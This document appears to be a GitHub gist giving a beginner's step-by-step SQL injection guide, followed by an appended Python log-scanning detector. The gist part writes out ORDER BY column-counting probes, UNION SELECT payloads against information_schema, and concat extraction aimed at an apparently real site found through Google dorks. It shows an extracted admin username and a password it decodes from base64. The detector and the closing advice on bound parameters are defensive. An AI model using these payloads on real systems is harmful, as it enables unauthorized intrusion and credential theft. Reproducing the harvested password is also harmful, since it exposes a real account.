@ProgramFilesx86
Created December 10, 2018 17:09
Mynoodmanualsqlinjec
1= check for the vulnerability (using google dorks of course)
so I found a target and I'll execute on it
we'll check it by adding 'or'
2= order injections {
+order+by+1
order by 1
+order+by+1--
} so we add numbers from 1 to 100 to guess the number of columns
the error message will look like "Unknown numbers of columns" or something like this
the error message showed up at number 7, so the number of columns is 6
3= union injections (table_name from information_schema.tables && column_name,3 from information_schema.columns where table_name='users') {
we'll inject these
union select 1,2,3,4,5,6
union all select 1,2,3,4,5,6
union select 1,2,3,4,5,6--
+union+select 1,2,3,4,5,6
+union+all+select 1,2,3,4,5,6
to show us the vulnerable columns
so you see the vulnerable columns are 4 & 6
we'll inject in them
so the purpose of this injection is to know the names of the tables in the database
there's a table named 'users', in which we'll find the users' data
now to know the data in this table we'll inject
follow me
}
4= using concat(1st ,0x3a, 2nd ,0x3a, ...) this is the final step to extract the data
we write concat(1st column , 2nd column , 3rd column)
so we extract the data with id 1 and username admin and password TSphIWx1QDUla0BwIUw=
the password is encoded with base64 (perhaps)
so the pwd is M*a!lu@5%k@p!L
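
Seen from the server side, the requests in steps 2 to 4 leave a recognizable trail in the access log. The following is an added example, not part of the original gist: it URL-decodes each request and flags the ORDER BY counting sweep, UNION SELECT with numeric placeholders, information_schema lookups and concat with 0x3a. The log entries, the paths, the `id` parameter and the column names `c1`/`c2` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Request shapes from steps 2-4 of the notes, matched after URL-decoding.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+(\d+)", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\s+\d+\s*,", re.I),
    "schema_lookup": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "concat_0x3a": re.compile(r"\bconcat\s*\([^)]*0x3a", re.I),
}

# Constructed sample log entries: (client IP, request target).
SAMPLE_LOG = [
    ("198.51.100.7", "/item.php?id=5+order+by+1--"),
    ("198.51.100.7", "/item.php?id=5+order+by+6--"),
    ("198.51.100.7", "/item.php?id=5+order+by+7--"),
    ("198.51.100.7", "/item.php?id=5+union+all+select+1,2,3,4,5,6--"),
    ("198.51.100.7", "/item.php?id=5%20union%20select%201,2,3,table_name,5,6"
                     "%20from%20information_schema.tables"),
    ("198.51.100.7", "/item.php?id=5+union+select+1,2,3,concat(c1,0x3a,c2),5,6"),
    ("203.0.113.20", "/search.php?q=trade+union+select+committee"),  # benign
    ("203.0.113.20", "/item.php?id=12&sort=order"),                  # benign
]

def decode(target):
    """Query string with '+' and %XX decoded; two passes catch double encoding."""
    return unquote_plus(unquote_plus(target.partition("?")[2]))

def classify(target):
    """Names of the rules that match one request target."""
    text = decode(target)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def order_by_sweeps(log, min_steps=3):
    """Clients that tried >= min_steps distinct ORDER BY indexes (step 2)."""
    seen = defaultdict(set)
    for ip, target in log:
        match = RULES["order_by_probe"].search(decode(target))
        if match:
            seen[ip].add(int(match.group(1)))
    return {ip: sorted(v) for ip, v in seen.items() if len(v) >= min_steps}

if __name__ == "__main__":
    for ip, target in SAMPLE_LOG:
        print(ip, classify(target) or "clean", target)
    print("column-count sweeps:", order_by_sweeps(SAMPLE_LOG))
```

Log matching like this only tells you the probing happened; what makes every step above fail is building the query with bound parameters instead of string concatenation.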